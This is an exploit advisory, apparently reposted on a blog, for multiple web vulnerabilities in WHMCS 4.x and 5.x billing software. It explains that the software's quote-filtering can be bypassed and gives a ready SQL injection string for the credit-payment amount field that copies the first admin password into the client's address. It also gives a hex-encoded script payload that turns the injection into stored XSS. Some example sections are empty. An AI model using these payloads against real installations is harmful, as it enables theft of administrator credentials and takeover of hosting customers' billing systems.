WHMCS 4.x & 5.x – Multiple Web Vulnerabilities

# Exploit Title: WHMCS v4.x & v5.x – Multiple Web Vulnerabilities
# Date: 2013-12-10
# Exploit Author: ahwak2000
# Vendor Homepage: http://whmcs.com/
# Version: 4.x , 5.x
# Tested on: win 7

+——————+
| Vulnerability |
+——————+

+——————+
| Description |
+——————+

the script use this function to secure the input
the function disable only the ‘ and ”
but we can bypass it if the query don’t use ‘

+————+
| Example |
+————+

file : admin/invoices.php

+————+
|Exploitation|
+————+

CSRF to SQL And Bypass Token

OR

+————+
| Example 2|
+————+

file : includes/invoicefunctions.php

+————+
|Exploitation|
+————+
Go to http://127.0.0.1/whmcs5214/viewinvoice.php?id=1 <~ edit if client have creditt and when he want to pay with credit in the "Enter the amount to apply:" put 0.01,Address2=(SELECT password from tbladmins limit 0,1) the admin password will be in the client address +-----------------+ sql => xss

SQL can convert to XSS
Must Encode XSS to Hex
Example :

(SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E)

SQL can be modified to work when all members and supervisors
(SELECT 0x3C7363726970743E616C6572742827616877616B3230303027293B3C2F7363726970743E)# <~ +-------------------+ ./END

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录